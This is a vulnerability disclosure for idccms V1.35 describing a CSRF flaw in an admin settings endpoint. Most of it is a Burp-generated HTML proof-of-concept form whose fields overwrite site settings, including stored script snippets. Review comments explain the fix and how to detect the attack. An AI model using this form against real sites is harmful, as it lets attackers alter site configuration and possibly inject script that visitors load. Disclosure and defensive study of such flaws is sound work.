Target: http://idccms.com/ Version: V1.35
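idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component http://127.0.0.1:80/admin/infoSys_deal.php?mudi=deal. The request shown below is a state-changing POST to that admin component, and none of its fields looks like an anti-CSRF token.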
PoC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<!--
  Review notes (defensive reading of this proof of concept):
  * The page holds one form that POSTs a full set of settings fields to
    /admin/infoSys_deal.php?mudi=deal on 127.0.0.1:80 (a loopback address).
  * None of the field names in the form looks like a per-session anti-CSRF
    token, which matches the report that the endpoint accepts the request
    without one.
  * The fix belongs on the server: require and verify an unpredictable
    per-session token on this POST, check the Origin/Referer header, and set
    the SameSite attribute on the admin session cookie as defense in depth.
  * For detection, look for POSTs to this admin endpoint whose Origin or
    Referer is not one of the site's own admin pages.
  * NOTE(review): the name and value attributes hold percent-encoded text. A
    browser encodes form data again on submit, so the server may receive these
    strings literally (for example the name moreArea%5B%5D). Confirm what the
    endpoint actually parses before using this page to verify a fix.
-->
<body>
<!-- History API call: rewrites the path shown in the address bar to "/" without loading a page. -->
<script>history.pushState('', '', '/')</script>
<!-- Cross-site POST to the admin settings handler named in the report. -->
<form action="http://127.0.0.1:80/admin/infoSys_deal.php?mudi=deal" method="POST">
<!-- dataTypeCN decodes to Chinese text meaning "article parameter settings". -->
<input type="hidden" name="dataType" value="" />
<input type="hidden" name="dataTypeCN" value="%E6%96%87%E7%AB%A0%E5%8F%82%E6%95%B0%E8%AE%BE%E7%BD%AE" />
<!-- backURL decodes to an /admin/infoSys.php?mudi=manage URL on 127.0.0.1; presumably the page shown after saving (confirm against the handler). -->
<input type="hidden" name="backURL" value="http%3A%2F%2F127.0.0.1%2Fadmin%2FinfoSys.php%3Fmudi%3Dmanage%26dataMode%3D%26dataModeStr%3D%26dataType%3D%26dataTypeCN%3D%25E6%2596%2587%25E7%25AB%25A0%25E5%258F%2582%25E6%2595%25B0%25E8%25AE%25BE%25E7%25BD%25AE%26dataType2%3D%26dataID%3D0%26menuID%3D442" />
<!-- The def*, tab*, is* and similar fields below are the settings values carried by the request; their meaning is defined by the application and is not visible here. -->
<input type="hidden" name="defIsAudit" value="1" />
<input type="hidden" name="defIsNew" value="1" />
<input type="hidden" name="defTopAddiID" value="0" />
<input type="hidden" name="defAddiID" value="0" />
<input type="hidden" name="defVoteMode" value="1" />
<input type="hidden" name="defMarkNews" value="1" />
<input type="hidden" name="defIsReply" value="1" />
<input type="hidden" name="defReadNum1" value="50" />
<input type="hidden" name="defReadNum2" value="150" />
<input type="hidden" name="defScore1" value="0" />
<input type="hidden" name="defScore2" value="0" />
<input type="hidden" name="defScore3" value="0" />
<input type="hidden" name="defCutScore1" value="0" />
<input type="hidden" name="defCutScore2" value="0" />
<input type="hidden" name="defCutScore3" value="0" />
<input type="hidden" name="defIsEnc" value="0" />
<input type="hidden" name="tabID" value="1" />
<input type="hidden" name="maxNewsNum" value="21" />
<input type="hidden" name="tabMaxNum" value="10000" />
<input type="hidden" name="tabCheckMin" value="0" />
<input type="hidden" name="moreArea%5B%5D" value="%7Ctemplate%7C" />
<input type="hidden" name="moreArea%5B%5D" value="%7CtopicID%7C" />
<input type="hidden" name="is360meta" value="1" />
<input type="hidden" name="isContentKey" value="1" />
<input type="hidden" name="isTime" value="1" />
<input type="hidden" name="isWriter" value="1" />
<input type="hidden" name="isSource" value="1" />
<input type="hidden" name="isReadNum" value="1" />
<input type="hidden" name="isReplyNum" value="1" />
<input type="hidden" name="oneReadNum" value="0" />
<input type="hidden" name="readNum1" value="1" />
<input type="hidden" name="readNum2" value="1" />
<input type="hidden" name="copyBtnName" value="%E7%82%B9%E5%87%BB%E8%AF%A5%E6%8C%89%E9%92%AE%EF%BC%8C%E5%A4%8D%E5%88%B6%E4%B8%8A%E9%9D%A2%E5%86%85%E5%AE%B9" />
<input type="hidden" name="fileTitle" value="%E9%99%84%E4%BB%B6%E4%B8%8B%E8%BD%BD" />
<input type="hidden" name="fileStyle" value="0" />
<input type="hidden" name="isHideFilePath" value="0" />
<input type="hidden" name="hiddenContent1" value="" />
<input type="hidden" name="hiddenContent2" value="" />
<input type="hidden" name="isNewsVote" value="1" />
<input type="hidden" name="newsVoteSecond" value="0" />
<!--
  newsVoteCode (and shareNewsCode further down) hold percent-encoded HTML and
  script snippets that load a script from bdimg.share.baidu.com over plain http.
  NOTE(review): if the application renders these stored values into article
  pages, a forged change to them reaches site visitors, which raises the
  impact of the missing CSRF check. Confirm how the values are rendered.
-->
<input type="hidden" name="newsVoteCode" value="%3Cdiv+class%3D%22bdlikebutton%22%3E%3C%2Fdiv%3E%0D%0A%3Cscript+id%3D%22bdlike_shell%22%3E%3C%2Fscript%3E%0D%0A%3Cscript%3E%0D%0Avar+bdShare_config+%3D+%7B%0D%0A%09%22type%22%3A%22large%22%2C%0D%0A%09%22color%22%3A%22blue%22%2C%0D%0A%09%22uid%22%3A%220%22%2C%0D%0A%09%22likeText%22%3A%22%E8%AF%A5%E6%96%87%E7%AB%A0%E4%B8%8D%E9%94%99%EF%BC%8C%E8%B0%A2%E8%B0%A2%E5%88%86%E4%BA%AB%22%2C%0D%0A%09%22likedText%22%3A%22%E8%B0%A2%E8%B0%A2%E6%94%AF%E6%8C%81%EF%BC%81%22%2C%0D%0A%09%22share%22%3A%22yes%22%0D%0A%7D%3B%0D%0Adocument.getElementById%28%22bdlike_shell%22%29.src%3D%22http%3A%2F%2Fbdimg.share.baidu.com%2Fstatic%2Fjs%2Flike_shell.js%3Ft%3D%22+%2B+Math.ceil%28new+Date%28%29%2F3600000%29%3B%0D%0A%3C%2Fscript%3E" />
<input type="hidden" name="prevAndNext" value="1" />
<input type="hidden" name="isMarkNews" value="1" />
<input type="hidden" name="isSaveMarkNewsId" value="1" />
<input type="hidden" name="isNewsReply" value="1" />
<input type="hidden" name="newsReplyNum" value="20" />
<input type="hidden" name="newsReplySecond" value="10" />
<input type="hidden" name="newsReplyAudit" value="1" />
<input type="hidden" name="newsReplyMaxLen" value="500" />
<input type="hidden" name="newsReplyName" value="%E7%AE%A1%E7%90%86%E5%91%98%E5%9B%9E%E5%A4%8D" />
<input type="hidden" name="isShareNews" value="1" />
<input type="hidden" name="shareNewsCode" value="%3Cdiv+class%3D%22bdsharebuttonbox%22%3E%3Ca+href%3D%22%23%22+class%3D%22bds_more%22+data-cmd%3D%22more%22%3E%E5%88%86%E4%BA%AB%E5%88%B0%EF%BC%9A%3C%2Fa%3E%3Ca+href%3D%22%23%22+class%3D%22bds_weixin%22+data-cmd%3D%22weixin%22+title%3D%22%E5%88%86%E4%BA%AB%E5%88%B0%E5%BE%AE%E4%BF%A1%22%3E%E5%BE%AE%E4%BF%A1%3C%2Fa%3E%3Ca+href%3D%22%23%22+class%3D%22bds_tsina%22+data-cmd%3D%22tsina%22+title%3D%22%E5%88%86%E4%BA%AB%E5%88%B0%E6%96%B0%E6%B5%AA%E5%BE%AE%E5%8D%9A%22%3E%E6%96%B0%E6%B5%AA%E5%BE%AE%E5%8D%9A%3C%2Fa%3E%3Ca+href%3D%22%23%22+class%3D%22bds_tqq%22+data-cmd%3D%22tqq%22+title%3D%22%E5%88%86%E4%BA%AB%E5%88%B0%E8%85%BE%E8%AE%AF%E5%BE%AE%E5%8D%9A%22%3E%E8%85%BE%E8%AE%AF%E5%BE%AE%E5%8D%9A%3C%2Fa%3E%3Ca+href%3D%22%23%22+class%3D%22bds_qzone%22+data-cmd%3D%22qzone%22+title%3D%22%E5%88%86%E4%BA%AB%E5%88%B0QQ%E7%A9%BA%E9%97%B4%22%3EQQ%E7%A9%BA%E9%97%B4%3C%2Fa%3E%3Ca+href%3D%22%23%22+class%3D%22bds_tqf%22+data-cmd%3D%22tqf%22+title%3D%22%E5%88%86%E4%BA%AB%E5%88%B0%E8%85%BE%E8%AE%AF%E6%9C%8B%E5%8F%8B%22%3E%E8%85%BE%E8%AE%AF%E6%9C%8B%E5%8F%8B%3C%2Fa%3E%3Ca+href%3D%22%23%22+class%3D%22bds_bdhome%22+data-cmd%3D%22bdhome%22+title%3D%22%E5%88%86%E4%BA%AB%E5%88%B0%E7%99%BE%E5%BA%A6%E6%96%B0%E9%A6%96%E9%A1%B5%22%3E%E7%99%BE%E5%BA%A6%E6%96%B0%E9%A6%96%E9%A1%B5%3C%2Fa%3E%3C%2Fdiv%3E%0D%0A%3Cscript%3Ewindow._bd_share_config%3D%7B%22common%22%3A%7B%22bdSnsKey%22%3A%7B%7D%2C%22bdText%22%3A%22%22%2C%22bdMini%22%3A%222%22%2C%22bdMiniList%22%3Afalse%2C%22bdPic%22%3A%22%22%2C%22bdStyle%22%3A%220%22%2C%22bdSize%22%3A%2216%22%7D%2C%22share%22%3A%7B%22bdSize%22%3A16%7D%7D%3Bwith%28document%290%5B%28getElementsByTagName%28%27head%27%29%5B0%5D%7C%7Cbody%29.appendChild%28createElement%28%27script%27%29%29.src%3D%27http%3A%2F%2Fbdimg.share.baidu.com%2Fstatic%2Fapi%2Fjs%2Fshare.js%3Fv%3D89860593.js%3Fcdnversion%3D%27%2B%7E%28-new+Date%28%29%2F36e5%29%5D%3B%3C%2Fscript%3E" />
<!-- NOTE(review): authState is sent as "false"; its meaning to the handler is not visible here, and it is a fixed value rather than a per-session secret. -->
<input type="hidden" name="authState" value="false" />
<!-- x and y are presumably the click coordinates of an image submit button in the original admin form (confirm against the admin page). -->
<input type="hidden" name="x" value="56" />
<input type="hidden" name="y" value="12" />
<!-- The page contains no auto-submit script; the request is sent only when this button is clicked. -->
<input type="submit" value="Submit request" />
</form>
</body>
</html>